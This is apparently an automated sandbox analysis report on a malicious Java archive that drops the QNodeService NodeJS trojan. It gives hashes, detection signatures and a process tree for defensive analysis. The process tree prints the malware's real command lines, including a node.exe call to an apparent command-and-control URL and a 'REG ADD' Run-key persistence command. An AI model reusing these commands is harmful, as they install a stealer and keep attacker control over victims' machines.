Analysis
-
max time kernel
126s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
21-07-2020 06:16
Static task
static1
Behavioral task
behavioral1
Sample
Inv. BL_PL.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Inv. BL_PL.jar
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
Inv. BL_PL.jar
-
Size
12KB
-
MD5
24d9c77865b6574dd50f830fe59668fb
-
SHA1
70ac5db53f5416b62587b84bff700a8d1c7678ef
-
SHA256
ba20f01565a3d7a9660f5bb5f3cbb1a9aa5bd9f085302d38d9874f99b70dde1a
-
SHA512
0363b44403c147f5671713dd8ff0e6a6392c6013294500586472195822104845e34298f51afcf4646fe4e23adb2d78d356b7960bf2c7288d120d9500830604ae
Score
10/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1632 wrote to memory of 3736 1632 java.exe 73 PID 1632 wrote to memory of 3736 1632 java.exe 73 PID 3736 wrote to memory of 3824 3736 node.exe 74 PID 3736 wrote to memory of 3824 3736 node.exe 74 PID 3824 wrote to memory of 2668 3824 cmd.exe 75 PID 3824 wrote to memory of 2668 3824 cmd.exe 75 PID 3736 wrote to memory of 3584 3736 node.exe 76 PID 3736 wrote to memory of 3584 3736 node.exe 76 -
Executes dropped EXE 2 IoCs
pid Process 3736 node.exe 3584 node.exe -
JavaScript code in executable 2 IoCs
resource yara_rule behavioral2/files/0x000100000001ad69-107.dat js behavioral2/files/0x000100000001ad69-113.dat js -
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bfab-109.dat family_qnodeservice -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe -
Loads dropped DLL 4 IoCs
pid Process 3584 node.exe 3584 node.exe 3584 node.exe 3584 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3584 node.exe 3584 node.exe -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 wtfismyip.com 18 wtfismyip.com -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-8206f221 = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-8206f221.cmd\"" reg.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Inv. BL_PL.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://danmax.dynip.online2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:3736 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-8206f221" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-8206f221.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-8206f221" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-8206f221.cmd\""4⤵
- Adds Run key to start application
PID:2668
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://danmax.dynip.online3⤵
- Executes dropped EXE
- Checks processor information in registry
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3584
-
-